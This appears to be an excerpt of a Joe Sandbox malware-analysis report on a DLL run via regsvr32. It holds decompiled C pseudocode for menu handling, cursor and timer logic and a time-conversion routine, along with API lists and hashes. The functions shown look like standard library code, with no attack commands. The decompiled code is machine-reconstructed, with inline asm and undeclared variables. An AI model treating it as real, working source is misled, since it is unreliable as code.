                                                                                                            						if( *_t7() != 0) {
                                                                                                            							_t17 = _a4;
                                                                                                            							if(_t14 == 0) {
                                                                                                            								__imp__#17();
                                                                                                            								_t17 = _t17 | 0x00003fc0;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						if((_a8 & 0x00003fc0) == _a8) {
                                                                                                            							__imp__#17();
                                                                                                            							_t17 = 0x3fc0;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					FreeLibrary(_t13);
                                                                                                            					return _t17;
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,10021FE1,?,00040000), ref: 10021567
                                                                                                            • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 10021570
                                                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 10021584
                                                                                                            • #17.COMCTL32 ref: 1002159F
                                                                                                            • #17.COMCTL32 ref: 100215BB
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 100215C8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                                            • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                                                            • API String ID: 1437655972-4218389149
                                                                                                            • Opcode ID: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
                                                                                                            • Instruction ID: b13861e3b3a9cf7542cab635660fc4a1c16e305f76032743bd7b4f367fd9abdc
                                                                                                            • Opcode Fuzzy Hash: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
                                                                                                            • Instruction Fuzzy Hash: BDF0317A604A76DFE2029FA6AC8894FB6ECEFD1291B024566F901E7251CB24DC0187A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 72%
                                                                                                            			E1003210C(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				int _v16;
                                                                                                            				signed int _v32;
                                                                                                            				intOrPtr _v36;
                                                                                                            				signed int _v40;
                                                                                                            				int _v44;
                                                                                                            				char _v48;
                                                                                                            				void* __ebp;
                                                                                                            				int _t59;
                                                                                                            				int _t60;
                                                                                                            				void* _t61;
                                                                                                            				int _t63;
                                                                                                            				signed int _t67;
                                                                                                            				int _t68;
                                                                                                            				void* _t69;
                                                                                                            				int _t71;
                                                                                                            				intOrPtr _t74;
                                                                                                            				int _t75;
                                                                                                            				int _t76;
                                                                                                            				struct HMENU__* _t88;
                                                                                                            				intOrPtr _t90;
                                                                                                            
                                                                                                            				_t74 = __ecx;
                                                                                                            				_v8 = __ecx;
                                                                                                            				E10029BA4( *((intOrPtr*)(__ecx + 0x1c)));
                                                                                                            				if(_a12 == 0) {
                                                                                                            					_t90 = _a4;
                                                                                                            					if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
                                                                                                            						L3:
                                                                                                            						E1001FFB4( &_v48);
                                                                                                            						_v36 = _t90;
                                                                                                            						if( *((intOrPtr*)(E100373A5() + 0x78)) !=  *(_t90 + 4)) {
                                                                                                            							if(GetMenu( *(_t74 + 0x1c)) == 0) {
                                                                                                            								L14:
                                                                                                            								_t59 = GetMenuItemCount( *(_t90 + 4));
                                                                                                            								_v40 = _v40 & 0x00000000;
                                                                                                            								_v16 = _t59;
                                                                                                            								if(_t59 <= 0) {
                                                                                                            									L34:
                                                                                                            									L35:
                                                                                                            									return _t59;
                                                                                                            								}
                                                                                                            								do {
                                                                                                            									_t60 = GetMenuItemID( *(_t90 + 4), _v40);
                                                                                                            									_v44 = _t60;
                                                                                                            									if(_t60 == 0) {
                                                                                                            										goto L33;
                                                                                                            									}
                                                                                                            									if(_t60 != 0xffffffff) {
                                                                                                            										_v32 = _v32 & 0x00000000;
                                                                                                            										if( *((intOrPtr*)(_t74 + 0x50)) == 0 || _t60 >= 0xf000) {
                                                                                                            											_t61 = 0;
                                                                                                            										} else {
                                                                                                            											_t61 = 1;
                                                                                                            										}
                                                                                                            										_push(_t61);
                                                                                                            										L27:
                                                                                                            										_push(_t74);
                                                                                                            										E1001FFDA( &_v48);
                                                                                                            										_t63 = GetMenuItemCount( *(_t90 + 4));
                                                                                                            										_t75 = _t63;
                                                                                                            										if(_t75 >= _v16) {
                                                                                                            											L32:
                                                                                                            											_v16 = _t75;
                                                                                                            											_t74 = _v8;
                                                                                                            											goto L33;
                                                                                                            										}
                                                                                                            										_v40 = _v40 + _t63 - _v16;
                                                                                                            										while(_v40 < _t75) {
                                                                                                            											if(GetMenuItemID( *(_t90 + 4), _v40) != _v44) {
                                                                                                            												goto L32;
                                                                                                            											}
                                                                                                            											_v40 = _v40 + 1;
                                                                                                            										}
                                                                                                            										goto L32;
                                                                                                            									}
                                                                                                            									_t67 = E1000822C(_t90, _v40);
                                                                                                            									_v32 = _t67;
                                                                                                            									if(_t67 == 0) {
                                                                                                            										goto L33;
                                                                                                            									}
                                                                                                            									_t68 = GetMenuItemID( *(_t67 + 4), 0);
                                                                                                            									_v44 = _t68;
                                                                                                            									if(_t68 != 0 && _t68 != 0xffffffff) {
                                                                                                            										_push(0);
                                                                                                            										goto L27;
                                                                                                            									}
                                                                                                            									L33:
                                                                                                            									_v40 = _v40 + 1;
                                                                                                            									_t59 = _v40;
                                                                                                            								} while (_t59 < _v16);
                                                                                                            								goto L34;
                                                                                                            							}
                                                                                                            							_t69 = E10023092(_t74);
                                                                                                            							if(_t69 == 0) {
                                                                                                            								goto L14;
                                                                                                            							}
                                                                                                            							_t88 = GetMenu( *(_t69 + 0x1c));
                                                                                                            							if(_t88 == 0) {
                                                                                                            								goto L14;
                                                                                                            							}
                                                                                                            							_t71 = GetMenuItemCount(_t88);
                                                                                                            							_t76 = 0;
                                                                                                            							_a12 = _t71;
                                                                                                            							if(_t71 <= 0) {
                                                                                                            								L13:
                                                                                                            								_t74 = _v8;
                                                                                                            								goto L14;
                                                                                                            							}
                                                                                                            							while(GetSubMenu(_t88, _t76) !=  *(_t90 + 4)) {
                                                                                                            								_t76 = _t76 + 1;
                                                                                                            								if(_t76 < _a12) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								goto L13;
                                                                                                            							}
                                                                                                            							_push(_t88);
                                                                                                            							_v12 = E10026280();
                                                                                                            							goto L13;
                                                                                                            						}
                                                                                                            						_v12 = _t90;
                                                                                                            						goto L14;
                                                                                                            					}
                                                                                                            					_push(0);
                                                                                                            					_push(_a8);
                                                                                                            					_push(_t90);
                                                                                                            					_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x7c)))) + 0x74))();
                                                                                                            					if(0 != 0) {
                                                                                                            						goto L35;
                                                                                                            					}
                                                                                                            					goto L3;
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}

                                                                                                            0x10032265
                                                                                                            0x100321f8
                                                                                                            0x100321ff
                                                                                                            0x10032202
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10032209
                                                                                                            0x1003220d
                                                                                                            0x10032210
                                                                                                            0x10032217
                                                                                                            0x00000000
                                                                                                            0x10032217
                                                                                                            0x10032270
                                                                                                            0x10032270
                                                                                                            0x10032273
                                                                                                            0x10032276
                                                                                                            0x00000000
                                                                                                            0x100321db
                                                                                                            0x10032178
                                                                                                            0x1003217f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10032186
                                                                                                            0x1003218a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1003218d
                                                                                                            0x10032193
                                                                                                            0x10032197
                                                                                                            0x1003219a
                                                                                                            0x100321ba
                                                                                                            0x100321ba
                                                                                                            0x00000000
                                                                                                            0x100321ba
                                                                                                            0x1003219c
                                                                                                            0x100321a9
                                                                                                            0x100321ad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100321af
                                                                                                            0x100321b1
                                                                                                            0x100321b7
                                                                                                            0x00000000
                                                                                                            0x100321b7
                                                                                                            0x10032162
                                                                                                            0x00000000
                                                                                                            0x10032162
                                                                                                            0x10032139
                                                                                                            0x1003213a
                                                                                                            0x1003213d
                                                                                                            0x1003213e
                                                                                                            0x10032143
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10032143
                                                                                                            0x10032283

                                                                                                            APIs
                                                                                                              • Part of subcall function 10029BA4: GetFocus.USER32(?,10032120,?), ref: 10029BA5
                                                                                                              • Part of subcall function 10029BA4: GetParent.USER32(00000000), ref: 10029BCE
                                                                                                              • Part of subcall function 10029BA4: GetWindowLongA.USER32 ref: 10029BE9
                                                                                                              • Part of subcall function 10029BA4: GetParent.USER32(10032120), ref: 10029BF7
                                                                                                              • Part of subcall function 10029BA4: GetDesktopWindow.USER32 ref: 10029BFB
                                                                                                              • Part of subcall function 10029BA4: SendMessageA.USER32 ref: 10029C0F
                                                                                                            • GetMenu.USER32(?), ref: 10032170
                                                                                                            • GetMenu.USER32(?), ref: 10032184
                                                                                                            • GetMenuItemCount.USER32 ref: 1003218D
                                                                                                            • GetSubMenu.USER32 ref: 1003219E
                                                                                                            • GetMenuItemCount.USER32 ref: 100321C0
                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 100321E1
                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 10032209
                                                                                                            • GetMenuItemCount.USER32 ref: 10032240
                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 1003225B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 4186786570-0
                                                                                                            • Opcode ID: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
                                                                                                            • Instruction ID: b99619ff26336beedcb7e2a7f55a8e8b58b7034f18844737f90654ad770cd7ca
                                                                                                            • Opcode Fuzzy Hash: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
                                                                                                            • Instruction Fuzzy Hash: 19415931900209AFDF42DFA4CE84AAEB7F5FF08792F214569E911EA152D731EE41DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 97%
                                                                                                            			E1002F502(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				struct tagPOINT _v20;
                                                                                                            				void* __ebp;
                                                                                                            				short _t42;
                                                                                                            				signed int _t49;
                                                                                                            				struct HWND__* _t60;
                                                                                                            				intOrPtr _t63;
                                                                                                            				intOrPtr _t66;
                                                                                                            				void* _t68;
                                                                                                            				void* _t71;
                                                                                                            				void* _t74;
                                                                                                            				intOrPtr _t83;
                                                                                                            				void* _t84;
                                                                                                            				intOrPtr _t85;
                                                                                                            				struct HWND__* _t87;
                                                                                                            				intOrPtr _t88;
                                                                                                            				intOrPtr* _t89;
                                                                                                            				void* _t90;
                                                                                                            
                                                                                                            				_t89 = __ecx;
                                                                                                            				_t42 = GetKeyState(1);
                                                                                                            				if(_t42 < 0) {
                                                                                                            					return _t42;
                                                                                                            				}
                                                                                                            				_t85 = E100373DB();
                                                                                                            				_v12 = _t85;
                                                                                                            				GetCursorPos( &_v20);
                                                                                                            				ScreenToClient( *(_t89 + 0x1c),  &_v20);
                                                                                                            				_t49 =  *((intOrPtr*)( *_t89 + 0x6c))(_v20.x, _v20.y, 0, _t84, _t71);
                                                                                                            				_v8 = _t49;
                                                                                                            				if(_t49 < 0) {
                                                                                                            					 *(_t85 + 0x78) =  *(_t85 + 0x78) | 0xffffffff;
                                                                                                            				} else {
                                                                                                            					_t74 = E10023092(_t89);
                                                                                                            					if(E100230BA() == 0 || E100203CE(_t74) == 0) {
                                                                                                            						_v8 = _v8 | 0xffffffff;
                                                                                                            					}
                                                                                                            					_t66 =  *((intOrPtr*)(_t85 + 0x3c));
                                                                                                            					if(_t66 != 0) {
                                                                                                            						_t88 =  *((intOrPtr*)(_t66 + 0x1c));
                                                                                                            					} else {
                                                                                                            						_t88 = 0;
                                                                                                            					}
                                                                                                            					_t68 = E100220EE(_t90, GetCapture());
                                                                                                            					if(_t68 != _t89) {
                                                                                                            						if(_t68 != 0) {
                                                                                                            							_t83 =  *((intOrPtr*)(_t68 + 0x1c));
                                                                                                            						} else {
                                                                                                            							_t83 = 0;
                                                                                                            						}
                                                                                                            						if(_t83 != _t88 && E10023092(_t68) == _t74) {
                                                                                                            							_v8 = _v8 | 0xffffffff;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if(_v8 < 0) {
                                                                                                            					L25:
                                                                                                            					if( *(_v12 + 0x78) == 0xffffffff) {
                                                                                                            						KillTimer( *(_t89 + 0x1c), 0xe001);
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)( *_t89 + 0x160))(0xffffffff);
                                                                                                            					goto L28;
                                                                                                            				} else {
                                                                                                            					ClientToScreen( *(_t89 + 0x1c),  &_v20);
                                                                                                            					_push(_v20.y);
                                                                                                            					_t87 = WindowFromPoint(_v20);
                                                                                                            					if(_t87 == 0) {
                                                                                                            						L23:
                                                                                                            						_t59 = _v12;
                                                                                                            						_v8 = _v8 | 0xffffffff;
                                                                                                            						 *(_t59 + 0x78) =  *(_v12 + 0x78) | 0xffffffff;
                                                                                                            						L24:
                                                                                                            						if(_v8 >= 0) {
                                                                                                            							L28:
                                                                                                            							_t53 = 0xe000;
                                                                                                            							if(_a4 == 0xe000) {
                                                                                                            								_t53 = KillTimer( *(_t89 + 0x1c), 0xe000);
                                                                                                            								if(_v8 >= 0) {
                                                                                                            									_t53 =  *((intOrPtr*)( *_t89 + 0x160))(_v8);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							return _t53;
                                                                                                            						}
                                                                                                            						goto L25;
                                                                                                            					}
                                                                                                            					_t60 =  *(_t89 + 0x1c);
                                                                                                            					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
                                                                                                            						goto L24;
                                                                                                            					} else {
                                                                                                            						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
                                                                                                            						if(_t63 != 0) {
                                                                                                            							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
                                                                                                            						}
                                                                                                            						if(_t63 == _t87) {
                                                                                                            							goto L24;
                                                                                                            						} else {
                                                                                                            							goto L23;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}






















                                                                                                            0x1002f5e3
                                                                                                            0x1002f609
                                                                                                            0x1002f609
                                                                                                            0x1002f60c
                                                                                                            0x1002f610
                                                                                                            0x1002f614
                                                                                                            0x1002f618
                                                                                                            0x1002f639
                                                                                                            0x1002f639
                                                                                                            0x1002f641
                                                                                                            0x1002f647
                                                                                                            0x1002f64d
                                                                                                            0x1002f656
                                                                                                            0x1002f656
                                                                                                            0x1002f64d
                                                                                                            0x00000000
                                                                                                            0x1002f65d
                                                                                                            0x00000000
                                                                                                            0x1002f618
                                                                                                            0x1002f5e5
                                                                                                            0x1002f5ea
                                                                                                            0x00000000
                                                                                                            0x1002f5f8
                                                                                                            0x1002f5fb
                                                                                                            0x1002f600
                                                                                                            0x1002f602
                                                                                                            0x1002f602
                                                                                                            0x1002f607
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002f607
                                                                                                            0x1002f5ea

                                                                                                            APIs
                                                                                                            • GetKeyState.USER32(00000001), ref: 1002F50D
                                                                                                            • GetCursorPos.USER32(?), ref: 1002F52C
                                                                                                            • ScreenToClient.USER32 ref: 1002F539
                                                                                                            • GetCapture.USER32 ref: 1002F586
                                                                                                              • Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7
                                                                                                            • ClientToScreen.USER32(?,?), ref: 1002F5CD
                                                                                                            • WindowFromPoint.USER32(?,?), ref: 1002F5D9
                                                                                                            • IsChild.USER32(?,00000000), ref: 1002F5EE
                                                                                                            • KillTimer.USER32(?,0000E001), ref: 1002F62B
                                                                                                            • KillTimer.USER32(?,0000E000), ref: 1002F647
                                                                                                              • Part of subcall function 100230BA: GetLastActivePopup.USER32(?), ref: 100230C3
                                                                                                              • Part of subcall function 100230BA: GetForegroundWindow.USER32(00000000,?,1002F565), ref: 100230D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
                                                                                                            • String ID:
                                                                                                            • API String ID: 1383385731-0
                                                                                                            • Opcode ID: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
                                                                                                            • Instruction ID: 10a8f74c3fcc8b415ddf3c509ebc5c8d81e0882429dab4cfcda73db0c152bb91
                                                                                                            • Opcode Fuzzy Hash: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
                                                                                                            • Instruction Fuzzy Hash: 1741AE31600619DFDB11DF65EC88A6E7BF6FF443A4FA18669E511D72A2DB30DE418B00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 69%
                                                                                                            			E1001328A(void* __eax, signed int __edx, intOrPtr _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				char _v16;
                                                                                                            				signed int _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				signed int _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				char _t72;
                                                                                                            				signed int _t74;
                                                                                                            				void* _t86;
                                                                                                            				void* _t88;
                                                                                                            				void* _t90;
                                                                                                            				void* _t92;
                                                                                                            				void* _t95;
                                                                                                            				void* _t98;
                                                                                                            				void* _t101;
                                                                                                            				void* _t105;
                                                                                                            				intOrPtr _t109;
                                                                                                            				intOrPtr _t111;
                                                                                                            				void* _t123;
                                                                                                            				signed int _t124;
                                                                                                            				signed int _t125;
                                                                                                            				void* _t127;
                                                                                                            				signed int _t133;
                                                                                                            				signed int _t138;
                                                                                                            				signed int _t139;
                                                                                                            				void* _t141;
                                                                                                            				signed int _t145;
                                                                                                            				signed int _t150;
                                                                                                            				signed int _t154;
                                                                                                            				signed int _t156;
                                                                                                            				signed int _t161;
                                                                                                            				signed int _t163;
                                                                                                            				void* _t171;
                                                                                                            
                                                                                                            				_t138 = __edx;
                                                                                                            				_t141 = __eax;
                                                                                                            				_t72 =  *((intOrPtr*)(__eax + 0x14));
                                                                                                            				asm("cdq");
                                                                                                            				_t154 = __edx;
                                                                                                            				_v16 = _t72;
                                                                                                            				_v12 = __edx;
                                                                                                            				if(_t154 < 0 || _t154 <= 0 && _t72 < 0x45) {
                                                                                                            					L30:
                                                                                                            					_t139 = _t138 | 0xffffffff;
                                                                                                            					__eflags = _t139;
                                                                                                            					return _t139;
                                                                                                            				} else {
                                                                                                            					_t156 = _v12;
                                                                                                            					if(_t156 > 0 || _t156 >= 0 && _v16 > 0x44c) {
                                                                                                            						goto L30;
                                                                                                            					} else {
                                                                                                            						_t74 =  *(_t141 + 0x10);
                                                                                                            						if(_t74 < 0 || _t74 > 0xb) {
                                                                                                            							asm("cdq");
                                                                                                            							_t124 = 0xc;
                                                                                                            							_t138 = _t74 % _t124;
                                                                                                            							_t125 = _t138;
                                                                                                            							asm("cdq");
                                                                                                            							_v16 = _v16 + _t74 / _t124;
                                                                                                            							 *(_t141 + 0x10) = _t125;
                                                                                                            							asm("adc [ebp-0x8], edx");
                                                                                                            							if(_t125 < 0) {
                                                                                                            								_v16 = _v16 + 0xffffffff;
                                                                                                            								 *(_t141 + 0x10) = _t125 + 0xc;
                                                                                                            								asm("adc dword [ebp-0x8], 0xffffffff");
                                                                                                            							}
                                                                                                            							_t161 = _v12;
                                                                                                            							if(_t161 < 0 || _t161 <= 0 && _v16 < 0x45) {
                                                                                                            								goto L30;
                                                                                                            							} else {
                                                                                                            								_t163 = _v12;
                                                                                                            								if(_t163 > 0 || _t163 >= 0 && _v16 > 0x44c) {
                                                                                                            									goto L30;
                                                                                                            								} else {
                                                                                                            									goto L16;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							L16:
                                                                                                            							_t145 =  *(_t141 + 0x10);
                                                                                                            							asm("cdq");
                                                                                                            							_v24 =  *((intOrPtr*)(0x1004cecc + _t145 * 4));
                                                                                                            							_v20 = _t138;
                                                                                                            							if((E10019490(_v16, _v12, 4, 0) | _t138) != 0 || (E10019490(_v16, _v12, 0x64, 0) | _t138) == 0) {
                                                                                                            								asm("adc ecx, 0x0");
                                                                                                            								if((E10019490(_v16 + 0x76c, _v12, 0x190, 0) | _t138) != 0) {
                                                                                                            									goto L21;
                                                                                                            								}
                                                                                                            								goto L19;
                                                                                                            							} else {
                                                                                                            								L19:
                                                                                                            								if(_t145 > 1) {
                                                                                                            									_v24 = _v24 + 1;
                                                                                                            									asm("adc dword [ebp-0x10], 0x0");
                                                                                                            								}
                                                                                                            								L21:
                                                                                                            								_t138 = _v12;
                                                                                                            								_t127 = 0;
                                                                                                            								_t147 = _v16 - 1;
                                                                                                            								asm("sbb eax, ecx");
                                                                                                            								_v28 = _v12;
                                                                                                            								asm("adc edx, ecx");
                                                                                                            								_v32 = _v16 - 1;
                                                                                                            								_t86 = E10013780(_v16 + 0x12b, _t138, 0x190, _t127);
                                                                                                            								asm("cdq");
                                                                                                            								asm("adc ecx, edx");
                                                                                                            								_v8 = _t138;
                                                                                                            								_t88 = E10013780(_v16 - 1, _v28, 0x64, 0);
                                                                                                            								asm("sbb eax, edx");
                                                                                                            								_t90 = E10013780(_t147, _v28, 4, 0);
                                                                                                            								asm("adc eax, edx");
                                                                                                            								_t92 = E100122A0(_v16, _v12, 0x16d, 0);
                                                                                                            								asm("adc eax, edx");
                                                                                                            								asm("adc eax, [ebp-0x10]");
                                                                                                            								_v8 = _t86 +  *((intOrPtr*)(_t141 + 0xc)) - _t88 + _t90 + _t92 + _v24 - 0x63df;
                                                                                                            								_t123 = 0;
                                                                                                            								asm("sbb eax, ebx");
                                                                                                            								_t95 = E100122A0(_v8, _v8, 0x18, _t123);
                                                                                                            								asm("cdq");
                                                                                                            								asm("adc edx, esi");
                                                                                                            								_t98 = E100122A0( *((intOrPtr*)(_t141 + 8)) + _t95, _t138, 0x3c, _t123);
                                                                                                            								asm("cdq");
                                                                                                            								asm("adc edx, esi");
                                                                                                            								_t101 = E100122A0( *((intOrPtr*)(_t141 + 4)) + _t98, _t138, 0x3c, _t123);
                                                                                                            								_t131 = _t101;
                                                                                                            								_t150 = _t138;
                                                                                                            								asm("cdq");
                                                                                                            								asm("adc edx, esi");
                                                                                                            								_t169 = _a4 - _t123;
                                                                                                            								_v16 =  *_t141 + _t101;
                                                                                                            								_v12 = _t138;
                                                                                                            								if(_a4 == _t123) {
                                                                                                            									_t105 = E10018BEF( &_v16);
                                                                                                            									L28:
                                                                                                            									if(_t105 == _t123) {
                                                                                                            										goto L30;
                                                                                                            									}
                                                                                                            									L29:
                                                                                                            									_t133 = 9;
                                                                                                            									return memcpy(_t141, _t105, _t133 << 2);
                                                                                                            								}
                                                                                                            								E100193FB(_t150, _t169);
                                                                                                            								_t109 =  *0x1004cde8; // 0x7080
                                                                                                            								asm("cdq");
                                                                                                            								_v16 = _v16 + _t109;
                                                                                                            								asm("adc [ebp-0x8], edx");
                                                                                                            								_t105 = E100134E7(_t131, _t138,  &_v16);
                                                                                                            								if(_t105 == _t123) {
                                                                                                            									goto L30;
                                                                                                            								}
                                                                                                            								_t136 =  *((intOrPtr*)(_t141 + 0x20));
                                                                                                            								_t171 =  *((intOrPtr*)(_t141 + 0x20)) - _t123;
                                                                                                            								if(_t171 > 0 || _t171 < 0 &&  *((intOrPtr*)(_t105 + 0x20)) > _t123) {
                                                                                                            									_t111 =  *0x1004cdf0; // 0xfffff1f0
                                                                                                            									asm("cdq");
                                                                                                            									_v16 = _v16 + _t111;
                                                                                                            									asm("adc [ebp-0x8], edx");
                                                                                                            									_t105 = E100134E7(_t136, _t138,  &_v16);
                                                                                                            									goto L28;
                                                                                                            								} else {
                                                                                                            									goto L29;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • __allrem.LIBCMT ref: 10013342
                                                                                                            • __allrem.LIBCMT ref: 1001335A
                                                                                                            • __allrem.LIBCMT ref: 10013376
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133B1
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133CD
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133E4
                                                                                                              • Part of subcall function 100193FB: __lock.LIBCMT ref: 10019413
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                                                            • String ID: E
                                                                                                            • API String ID: 4106114094-3568589458
                                                                                                            • Opcode ID: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
                                                                                                            • Instruction ID: 8c17dd76723e682d1ec04a20f3335422bd29dcdf082c608cde21ea215b529c0d
                                                                                                            • Opcode Fuzzy Hash: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
                                                                                                            • Instruction Fuzzy Hash: 90716CB5E00219BFEB55DEE8CC81B9EB7B5EB44324F14C1A9E514EB281D774EA808B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E1001843D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				intOrPtr _t42;
                                                                                                            				void* _t43;
                                                                                                            				short* _t45;
                                                                                                            				int _t58;
                                                                                                            				int _t62;
                                                                                                            				long _t65;
                                                                                                            				int _t67;
                                                                                                            				void* _t69;
                                                                                                            				short* _t77;
                                                                                                            				short* _t78;
                                                                                                            				int _t79;
                                                                                                            				short* _t83;
                                                                                                            				short* _t84;
                                                                                                            				void* _t85;
                                                                                                            				short* _t86;
                                                                                                            				void* _t91;
                                                                                                            
